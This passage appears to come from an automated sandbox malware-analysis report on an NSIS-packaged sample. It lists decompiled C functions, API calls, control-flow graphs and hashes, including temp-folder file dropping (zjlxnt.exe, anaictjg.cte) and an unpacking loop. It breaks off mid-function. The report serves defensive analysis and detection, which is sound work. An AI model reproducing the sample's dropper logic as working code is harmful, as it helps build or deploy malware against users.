                                                          • lstrcatW.KERNEL32(00000000,00000000), ref: 004017B0
                                                          • CompareFileTime.KERNEL32(-00000014,?,"C:\Users\user\AppData\Local\Temp\zjlxnt.exe" C:\Users\user\AppData\Local\Temp\anaictjg.cte,"C:\Users\user\AppData\Local\Temp\zjlxnt.exe" C:\Users\user\AppData\Local\Temp\anaictjg.cte,00000000,00000000,"C:\Users\user\AppData\Local\Temp\zjlxnt.exe" C:\Users\user\AppData\Local\Temp\anaictjg.cte,00436000,?,?,00000031), ref: 004017D5
                                                            • Part of subcall function 00406668: lstrcpynW.KERNEL32(?,?,00000400,004037B0,00429260,NSIS Error), ref: 00406675
                                                            • Part of subcall function 004056CA: lstrlenW.KERNEL32(00422728,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030A8,00000000,?), ref: 00405702
                                                            • Part of subcall function 004056CA: lstrlenW.KERNEL32(004030A8,00422728,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030A8,00000000), ref: 00405712
                                                            • Part of subcall function 004056CA: lstrcatW.KERNEL32(00422728,004030A8), ref: 00405725
                                                            • Part of subcall function 004056CA: SetWindowTextW.USER32(00422728,00422728), ref: 00405737
                                                            • Part of subcall function 004056CA: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040575D
                                                            • Part of subcall function 004056CA: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405777
                                                            • Part of subcall function 004056CA: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405785
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.322461712.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.322455257.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.322470834.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.322480782.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.322480782.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.322480782.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.322480782.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.322480782.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.322520599.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                          Similarity
                                                          • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                          • String ID: "C:\Users\user\AppData\Local\Temp\zjlxnt.exe" C:\Users\user\AppData\Local\Temp\anaictjg.cte$C:\Users\user\AppData\Local\Temp
                                                          • API String ID: 1941528284-797857900
                                                          • Opcode ID: 453958bc0cd1b2dd253e880fcd992b37c005c95db4a67daf6dea3c0e9c97f409
                                                          • Instruction ID: 87dd38174d63fc88252c3cacf76d35d2aef1a13c6195c1d88e2760da23471212
                                                          • Opcode Fuzzy Hash: 453958bc0cd1b2dd253e880fcd992b37c005c95db4a67daf6dea3c0e9c97f409
                                                          • Instruction Fuzzy Hash: DE41B771500205BACF10BBB5CD85DAE7A75EF45328B20473FF422B21E1D63D89619A2E
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 525 4069c5-4069e5 GetSystemDirectoryW 526 4069e7 525->526 527 4069e9-4069eb 525->527 526->527 528 4069fc-4069fe 527->528 529 4069ed-4069f6 527->529 531 4069ff-406a32 wsprintfW LoadLibraryExW 528->531 529->528 530 4069f8-4069fa 529->530 530->531
                                                          C-Code - Quality: 100%
                                                          			E004069C5(intOrPtr _a4) {
                                                          				short _v576;
                                                          				signed int _t13;
                                                          				struct HINSTANCE__* _t17;
                                                          				signed int _t19;
                                                          				void* _t24;
                                                          
                                                          				_t13 = GetSystemDirectoryW( &_v576, 0x104);
                                                          				if(_t13 > 0x104) {
                                                          					_t13 = 0;
                                                          				}
                                                          				if(_t13 == 0 ||  *((short*)(_t24 + _t13 * 2 - 0x23e)) == 0x5c) {
                                                          					_t19 = 1;
                                                          				} else {
                                                          					_t19 = 0;
                                                          				}
                                                          				wsprintfW(_t24 + _t13 * 2 - 0x23c, L"%s%S.dll", 0x40a014 + _t19 * 2, _a4);
                                                          				_t17 = LoadLibraryExW( &_v576, 0, 8); // executed
                                                          				return _t17;
                                                          			}








                                                          0x004069dc
                                                          0x004069e5
                                                          0x004069e7
                                                          0x004069e7
                                                          0x004069eb
                                                          0x004069fe
                                                          0x004069f8
                                                          0x004069f8
                                                          0x004069f8
                                                          0x00406a17
                                                          0x00406a2b
                                                          0x00406a32

                                                          APIs
                                                          • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004069DC
                                                          • wsprintfW.USER32 ref: 00406A17
                                                          • LoadLibraryExW.KERNELBASE(?,00000000,00000008), ref: 00406A2B
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.322461712.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.322455257.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.322470834.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.322480782.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.322480782.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.322480782.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.322480782.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.322480782.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.322520599.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                          Similarity
                                                          • API ID: DirectoryLibraryLoadSystemwsprintf
                                                          • String ID: %s%S.dll$UXTHEME$\
                                                          • API String ID: 2200240437-1946221925
                                                          • Opcode ID: 63130bafcb32548bd4340548baa3f8658423137b3882cd96386db367ad08b740
                                                          • Instruction ID: e2ac2e7087162e0187f8b4d6776822ec24d6e31928394cf94a41c199a4feb156
                                                          • Opcode Fuzzy Hash: 63130bafcb32548bd4340548baa3f8658423137b3882cd96386db367ad08b740
                                                          • Instruction Fuzzy Hash: 3AF096B154121DA7DB14AB68DD0EF9B366CAB00705F11447EA646F20E0EB7CDA68CB98
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 532 405b99-405be4 CreateDirectoryW 533 405be6-405be8 532->533 534 405bea-405bf7 GetLastError 532->534 535 405c11-405c13 533->535 534->535 536 405bf9-405c0d SetFileSecurityW 534->536 536->533 537 405c0f GetLastError 536->537 537->535
                                                          C-Code - Quality: 100%
                                                          			E00405B99(WCHAR* _a4) {
                                                          				struct _SECURITY_ATTRIBUTES _v16;
                                                          				struct _SECURITY_DESCRIPTOR _v36;
                                                          				int _t22;
                                                          				long _t23;
                                                          
                                                          				_v36.Sbz1 = _v36.Sbz1 & 0x00000000;
                                                          				_v36.Owner = 0x4083f8;
                                                          				_v36.Group = 0x4083f8;
                                                          				_v36.Sacl = _v36.Sacl & 0x00000000;
                                                          				_v16.bInheritHandle = _v16.bInheritHandle & 0x00000000;
                                                          				_v16.lpSecurityDescriptor =  &_v36;
                                                          				_v36.Revision = 1;
                                                          				_v36.Control = 4;
                                                          				_v36.Dacl = 0x4083e8;
                                                          				_v16.nLength = 0xc;
                                                          				_t22 = CreateDirectoryW(_a4,  &_v16); // executed
                                                          				if(_t22 != 0) {
                                                          					L1:
                                                          					return 0;
                                                          				}
                                                          				_t23 = GetLastError();
                                                          				if(_t23 == 0xb7) {
                                                          					if(SetFileSecurityW(_a4, 0x80000007,  &_v36) != 0) {
                                                          						goto L1;
                                                          					}
                                                          					return GetLastError();
                                                          				}
                                                          				return _t23;
                                                          			}







                                                          0x00405ba4
                                                          0x00405ba8
                                                          0x00405bab
                                                          0x00405bb1
                                                          0x00405bb5
                                                          0x00405bb9
                                                          0x00405bc1
                                                          0x00405bc8
                                                          0x00405bce
                                                          0x00405bd5
                                                          0x00405bdc
                                                          0x00405be4
                                                          0x00405be6
                                                          0x00000000
                                                          0x00405be6
                                                          0x00405bf0
                                                          0x00405bf7
                                                          0x00405c0d
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00405c0f
                                                          0x00405c13

                                                          APIs
                                                          • CreateDirectoryW.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 00405BDC
                                                          • GetLastError.KERNEL32 ref: 00405BF0
                                                          • SetFileSecurityW.ADVAPI32(?,80000007,00000001), ref: 00405C05
                                                          • GetLastError.KERNEL32 ref: 00405C0F
                                                          Strings
                                                          • C:\Users\user\AppData\Local\Temp\, xrefs: 00405BBF
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.322461712.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.322455257.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.322470834.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.322480782.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.322480782.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.322480782.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.322480782.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.322480782.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.322520599.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                          Similarity
                                                          • API ID: ErrorLast$CreateDirectoryFileSecurity
                                                          • String ID: C:\Users\user\AppData\Local\Temp\
                                                          • API String ID: 3449924974-823278215
                                                          • Opcode ID: 4d8c721838b8a92ea27708fe49d100345a2f80ebd1be40878b53e15a1b169c58
                                                          • Instruction ID: 886f74eda6482ab63e8fe18d08a652fea41827dc0a526659a7d7b5e138c44e4e
                                                          • Opcode Fuzzy Hash: 4d8c721838b8a92ea27708fe49d100345a2f80ebd1be40878b53e15a1b169c58
                                                          • Instruction Fuzzy Hash: 95010871D04219EAEF009FA1CD44BEFBBB8EF14314F04403ADA44B6180E7789648CB99
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 538 406187-406193 539 406194-4061c8 GetTickCount GetTempFileNameW 538->539 540 4061d7-4061d9 539->540 541 4061ca-4061cc 539->541 543 4061d1-4061d4 540->543 541->539 542 4061ce 541->542 542->543
                                                          C-Code - Quality: 100%
                                                          			E00406187(void* __ecx, WCHAR* _a4, WCHAR* _a8) {
                                                          				intOrPtr _v8;
                                                          				short _v12;
                                                          				short _t12;
                                                          				intOrPtr _t13;
                                                          				signed int _t14;
                                                          				WCHAR* _t17;
                                                          				signed int _t19;
                                                          				signed short _t23;
                                                          				WCHAR* _t26;
                                                          
                                                          				_t26 = _a4;
                                                          				_t23 = 0x64;
                                                          				while(1) {
                                                          					_t12 =  *L"nsa"; // 0x73006e
                                                          					_t23 = _t23 - 1;
                                                          					_v12 = _t12;
                                                          					_t13 =  *0x40a5ac; // 0x61
                                                          					_v8 = _t13;
                                                          					_t14 = GetTickCount();
                                                          					_t19 = 0x1a;
                                                          					_v8 = _v8 + _t14 % _t19;
                                                          					_t17 = GetTempFileNameW(_a8,  &_v12, 0, _t26); // executed
                                                          					if(_t17 != 0) {
                                                          						break;
                                                          					}
                                                          					if(_t23 != 0) {
                                                          						continue;
                                                          					} else {
                                                          						 *_t26 =  *_t26 & _t23;
                                                          					}
                                                          					L4:
                                                          					return _t17;
                                                          				}
                                                          				_t17 = _t26;
                                                          				goto L4;
                                                          			}












                                                          0x0040618d
                                                          0x00406193
                                                          0x00406194
                                                          0x00406194
                                                          0x00406199
                                                          0x0040619a
                                                          0x0040619d
                                                          0x004061a2
                                                          0x004061a5
                                                          0x004061af
                                                          0x004061bc
                                                          0x004061c0
                                                          0x004061c8
                                                          0x00000000
                                                          0x00000000
                                                          0x004061cc
                                                          0x00000000
                                                          0x004061ce
                                                          0x004061ce
                                                          0x004061ce
                                                          0x004061d1
                                                          0x004061d4
                                                          0x004061d4
                                                          0x004061d7
                                                          0x00000000

                                                          APIs
                                                          • GetTickCount.KERNEL32 ref: 004061A5
                                                          • GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,?,0040363E,1033,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403923), ref: 004061C0
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.322461712.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.322455257.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.322470834.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.322480782.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.322480782.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.322480782.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.322480782.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.322480782.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.322520599.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                          Similarity
                                                          • API ID: CountFileNameTempTick
                                                          • String ID: C:\Users\user\AppData\Local\Temp\$nsa
                                                          • API String ID: 1716503409-44229769
                                                          • Opcode ID: 6315ab6e6f8253ba2c88c9b6803a176270f8621abb800126aa0f3c3b7b9ef66c
                                                          • Instruction ID: 21b676f9b33da427d45e0b2d6905a63b6509bf3d89a4e990effff8b21c6fdcbe
                                                          • Opcode Fuzzy Hash: 6315ab6e6f8253ba2c88c9b6803a176270f8621abb800126aa0f3c3b7b9ef66c
                                                          • Instruction Fuzzy Hash: C3F09076700214BFEB008F59DD05E9AB7BCEBA1710F11803AEE05EB180E6B0A9648768
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 544 403c25-403c34 545 403c40-403c48 544->545 546 403c36-403c39 CloseHandle 544->546 547 403c54-403c60 call 403c82 call 405d74 545->547 548 403c4a-403c4d CloseHandle 545->548 546->545 552 403c65-403c66 547->552 548->547
                                                          C-Code - Quality: 100%
                                                          			E00403C25() {
                                                          				void* _t1;
                                                          				void* _t2;
                                                          				void* _t4;
                                                          				signed int _t11;
                                                          
                                                          				_t1 =  *0x40a018; // 0xffffffff
                                                          				if(_t1 != 0xffffffff) {
                                                          					CloseHandle(_t1);
                                                          					 *0x40a018 =  *0x40a018 | 0xffffffff;
                                                          				}
                                                          				_t2 =  *0x40a01c; // 0xffffffff
                                                          				if(_t2 != 0xffffffff) {
                                                          					CloseHandle(_t2);
                                                          					 *0x40a01c =  *0x40a01c | 0xffffffff;
                                                          					_t11 =  *0x40a01c;
                                                          				}
                                                          				E00403C82();
                                                          				_t4 = E00405D74(_t11, L"C:\\Users\\alfons\\AppData\\Local\\Temp\\nsd8C07.tmp\\", 7); // executed
                                                          				return _t4;
                                                          			}







                                                          0x00403c25
                                                          0x00403c34
                                                          0x00403c37
                                                          0x00403c39
                                                          0x00403c39
                                                          0x00403c40
                                                          0x00403c48
                                                          0x00403c4b
                                                          0x00403c4d
                                                          0x00403c4d
                                                          0x00403c4d
                                                          0x00403c54
                                                          0x00403c60
                                                          0x00403c66

                                                          APIs
                                                          • CloseHandle.KERNEL32(FFFFFFFF,C:\Users\user\AppData\Local\Temp\,00403B71,?), ref: 00403C37
                                                          • CloseHandle.KERNEL32(FFFFFFFF,C:\Users\user\AppData\Local\Temp\,00403B71,?), ref: 00403C4B
                                                          Strings
                                                          • C:\Users\user\AppData\Local\Temp\nsd8C07.tmp\, xrefs: 00403C5B
                                                          • C:\Users\user\AppData\Local\Temp\, xrefs: 00403C2A
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.322461712.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.322455257.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.322470834.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.322480782.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.322480782.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.322480782.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.322480782.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.322480782.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.322520599.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                          Similarity
                                                          • API ID: CloseHandle
                                                          • String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\nsd8C07.tmp\
                                                          • API String ID: 2962429428-1301421828
                                                          • Opcode ID: 3450910aa3eb4a83e9339ad550daa728f038e8843dee50fd20da138f79135bda
                                                          • Instruction ID: ab9e488bef71b432d29da19662b82269d7b8f1628316f3e3d8f7e3aa77a32ace
                                                          • Opcode Fuzzy Hash: 3450910aa3eb4a83e9339ad550daa728f038e8843dee50fd20da138f79135bda
                                                          • Instruction Fuzzy Hash: 3BE0863244471496E5246F7DAF4D9853B285F413357248726F178F60F0C7389A9B4A9D
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 636 40603f-40605a call 406668 call 405fe2 641 406060-40606d call 4068ef 636->641 642 40605c-40605e 636->642 646 40607d-406081 641->646 647 40606f-406075 641->647 643 4060b8-4060ba 642->643 649 406097-4060a0 lstrlenW 646->649 647->642 648 406077-40607b 647->648 648->642 648->646 650 4060a2-4060b6 call 405f37 GetFileAttributesW 649->650 651 406083-40608a call 40699e 649->651 650->643 656 406091-406092 call 405f83 651->656 657 40608c-40608f 651->657 656->649 657->642 657->656
                                                          C-Code - Quality: 53%
                                                          			E0040603F(void* __eflags, intOrPtr _a4) {
                                                          				int _t11;
                                                          				signed char* _t12;
                                                          				long _t16;
                                                          				intOrPtr _t18;
                                                          				intOrPtr* _t21;
                                                          				signed int _t23;
                                                          
                                                          				E00406668(0x425f50, _a4);
                                                          				_t21 = E00405FE2(0x425f50);
                                                          				if(_t21 != 0) {
                                                          					E004068EF(_t21);
                                                          					if(( *0x42a278 & 0x00000080) == 0) {
                                                          						L5:
                                                          						_t23 = _t21 - 0x425f50 >> 1;
                                                          						while(1) {
                                                          							_t11 = lstrlenW(0x425f50);
                                                          							_push(0x425f50);
                                                          							if(_t11 <= _t23) {
                                                          								break;
                                                          							}
                                                          							_t12 = E0040699E();
                                                          							if(_t12 == 0 || ( *_t12 & 0x00000010) != 0) {
                                                          								E00405F83(0x425f50);
                                                          								continue;
                                                          							} else {
                                                          								goto L1;
                                                          							}
                                                          						}
                                                          						E00405F37();
                                                          						_t16 = GetFileAttributesW(??); // executed
                                                          						return 0 | _t16 != 0xffffffff;
                                                          					}
                                                          					_t18 =  *_t21;
                                                          					if(_t18 == 0 || _t18 == 0x5c) {
                                                          						goto L1;
                                                          					} else {
                                                          						goto L5;
                                                          					}
                                                          				}
                                                          				L1:
                                                          				return 0;
                                                          			}









                                                          0x0040604b
                                                          0x00406056
                                                          0x0040605a
                                                          0x00406061
                                                          0x0040606d
                                                          0x0040607d
                                                          0x0040607f
                                                          0x00406097
                                                          0x00406098
                                                          0x0040609f
                                                          0x004060a0
                                                          0x00000000
                                                          0x00000000
                                                          0x00406083
                                                          0x0040608a
                                                          0x00406092
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x0040608a
                                                          0x004060a2
                                                          0x004060a8
                                                          0x00000000
                                                          0x004060b6
                                                          0x0040606f
                                                          0x00406075
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00406075
                                                          0x0040605c
                                                          0x00000000

                                                          APIs
                                                            • Part of subcall function 00406668: lstrcpynW.KERNEL32(?,?,00000400,004037B0,00429260,NSIS Error), ref: 00406675
                                                            • Part of subcall function 00405FE2: CharNextW.USER32(?,?,00425F50,?,00406056,00425F50,00425F50,766DFAA0,?,766DF560,00405D94,?,766DFAA0,766DF560,00000000), ref: 00405FF0
                                                            • Part of subcall function 00405FE2: CharNextW.USER32(00000000), ref: 00405FF5
                                                            • Part of subcall function 00405FE2: CharNextW.USER32(00000000), ref: 0040600D
                                                          • lstrlenW.KERNEL32(00425F50,00000000,00425F50,00425F50,766DFAA0,?,766DF560,00405D94,?,766DFAA0,766DF560,00000000), ref: 00406098
                                                          • GetFileAttributesW.KERNELBASE(00425F50,00425F50,00425F50,00425F50,00425F50,00425F50,00000000,00425F50,00425F50,766DFAA0,?,766DF560,00405D94,?,766DFAA0,766DF560), ref: 004060A8
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.322461712.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.322455257.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.322470834.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.322480782.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.322480782.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.322480782.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.322480782.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.322480782.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.322520599.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                          Similarity
                                                          • API ID: CharNext$AttributesFilelstrcpynlstrlen
                                                          • String ID: P_B
                                                          • API String ID: 3248276644-906794629
                                                          • Opcode ID: 900e3a3aedd828ccf636743a116f58552bc6887dcb5d3e9637a901da882d1290
                                                          • Instruction ID: df110f430b83b9381375b5fd3fa67f6c4419d4890c6468873e0fced3c2676832
                                                          • Opcode Fuzzy Hash: 900e3a3aedd828ccf636743a116f58552bc6887dcb5d3e9637a901da882d1290
                                                          • Instruction Fuzzy Hash: 0DF07826144A1216E622B23A0C05BAF05098F82354B07063FFC93B22E1DF3C8973C43E
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 659 407194-40719a 660 40719c-40719e 659->660 661 40719f-4071bd 659->661 660->661 662 407490-40749d 661->662 663 4073cb-4073e0 661->663 666 4074c7-4074cb 662->666 664 4073e2-4073f8 663->664 665 4073fa-407410 663->665 667 407413-40741a 664->667 665->667 668 40752b-40753e 666->668 669 4074cd-4074ee 666->669 670 407441 667->670 671 40741c-407420 667->671 674 407447-40744d 668->674 672 4074f0-407505 669->672 673 407507-40751a 669->673 670->674 675 407426-40743e 671->675 676 4075cf-4075d9 671->676 677 40751d-407524 672->677 673->677 679 406bf2 674->679 680 4075fa 674->680 675->670 681 4075e5-4075f8 676->681 682 4074c4 677->682 683 407526 677->683 684 406bf9-406bfd 679->684 685 406d39-406d5a 679->685 686 406c9e-406ca2 679->686 687 406d0e-406d12 679->687 689 4075fd-407601 680->689 681->689 682->666 690 4074a9-4074c1 683->690 691 4075db 683->691 684->681 692 406c03-406c10 684->692 685->663 695 406ca8-406cc1 686->695 696 40754e-407558 686->696 693 406d18-406d2c 687->693 694 40755d-407567 687->694 690->682 691->681 692->680 697 406c16-406c5c 692->697 698 406d2f-406d37 693->698 694->681 699 406cc4-406cc8 695->699 696->681 700 406c84-406c86 697->700 701 406c5e-406c62 697->701 698->685 698->687 699->686 702 406cca-406cd0 699->702 707 406c94-406c9c 700->707 708 406c88-406c92 700->708 705 406c64-406c67 GlobalFree 701->705 706 406c6d-406c7b GlobalAlloc 701->706 703 406cd2-406cd9 702->703 704 406cfa-406d0c 702->704 709 406ce4-406cf4 GlobalAlloc 703->709 710 406cdb-406cde GlobalFree 703->710 704->698 705->706 706->680 711 406c81 706->711 707->699 708->707 708->708 709->680 709->704 710->709 711->700
                                                          C-Code - Quality: 99%
                                                          			E00407194() {
                                                          				signed int _t530;
                                                          				void _t537;
                                                          				signed int _t538;
                                                          				signed int _t539;
                                                          				unsigned short _t569;
                                                          				signed int _t579;
                                                          				signed int _t607;
                                                          				void* _t627;
                                                          				signed int _t628;
                                                          				signed int _t635;
                                                          				signed int* _t643;
                                                          				void* _t644;
                                                          
                                                          				L0:
                                                          				while(1) {
                                                          					L0:
                                                          					_t530 =  *(_t644 - 0x30);
                                                          					if(_t530 >= 4) {
                                                          					}
                                                          					 *(_t644 - 0x40) = 6;
                                                          					 *(_t644 - 0x7c) = 0x19;
                                                          					 *((intOrPtr*)(_t644 - 0x58)) = (_t530 << 7) +  *(_t644 - 4) + 0x360;
                                                          					while(1) {
                                                          						L145:
                                                          						 *(_t644 - 0x50) = 1;
                                                          						 *(_t644 - 0x48) =  *(_t644 - 0x40);
                                                          						while(1) {
                                                          							L149:
                                                          							if( *(_t644 - 0x48) <= 0) {
                                                          								goto L155;
                                                          							}
                                                          							L150:
                                                          							_t627 =  *(_t644 - 0x50) +  *(_t644 - 0x50);
                                                          							_t643 = _t627 +  *((intOrPtr*)(_t644 - 0x58));
                                                          							 *(_t644 - 0x54) = _t643;
                                                          							_t569 =  *_t643;
                                                          							_t635 = _t569 & 0x0000ffff;
                                                          							_t607 = ( *(_t644 - 0x10) >> 0xb) * _t635;
                                                          							if( *(_t644 - 0xc) >= _t607) {
                                                          								 *(_t644 - 0x10) =  *(_t644 - 0x10) - _t607;
                                                          								 *(_t644 - 0xc) =  *(_t644 - 0xc) - _t607;
                                                          								_t628 = _t627 + 1;
                                                          								 *_t643 = _t569 - (_t569 >> 5);
                                                          								 *(_t644 - 0x50) = _t628;
                                                          							} else {
                                                          								 *(_t644 - 0x10) = _t607;
                                                          								 *(_t644 - 0x50) =  *(_t644 - 0x50) << 1;
                                                          								 *_t643 = (0x800 - _t635 >> 5) + _t569;
                                                          							}
                                                          							if( *(_t644 - 0x10) >= 0x1000000) {
                                                          								L148:
                                                          								_t487 = _t644 - 0x48;
                                                          								 *_t487 =  *(_t644 - 0x48) - 1;
                                                          								L149:
                                                          								if( *(_t644 - 0x48) <= 0) {
                                                          									goto L155;
                                                          								}
                                                          								goto L150;
                                                          							} else {
                                                          								L154:
                                                          								L146:
                                                          								if( *(_t644 - 0x6c) == 0) {
                                                          									L169:
                                                          									 *(_t644 - 0x88) = 0x18;
                                                          									L170:
                                                          									_t579 = 0x22;
                                                          									memcpy( *(_t644 - 0x90), _t644 - 0x88, _t579 << 2);
                                                          									_t539 = 0;
                                                          									L172:
                                                          									return _t539;
                                                          								}
                                                          								L147:
                                                          								 *(_t644 - 0x10) =  *(_t644 - 0x10) << 8;
                                                          								 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
                                                          								_t484 = _t644 - 0x70;
                                                          								 *_t484 =  &(( *(_t644 - 0x70))[1]);
                                                          								 *(_t644 - 0xc) =  *(_t644 - 0xc) << 0x00000008 |  *( *(_t644 - 0x70)) & 0x000000ff;
                                                          								goto L148;
                                                          							}
                                                          							L155:
                                                          							_t537 =  *(_t644 - 0x7c);
                                                          							 *((intOrPtr*)(_t644 - 0x44)) =  *(_t644 - 0x50) - (1 <<  *(_t644 - 0x40));
                                                          							while(1) {
                                                          								L140:
                                                          								 *(_t644 - 0x88) = _t537;
                                                          								while(1) {
                                                          									L1:
                                                          									_t538 =  *(_t644 - 0x88);
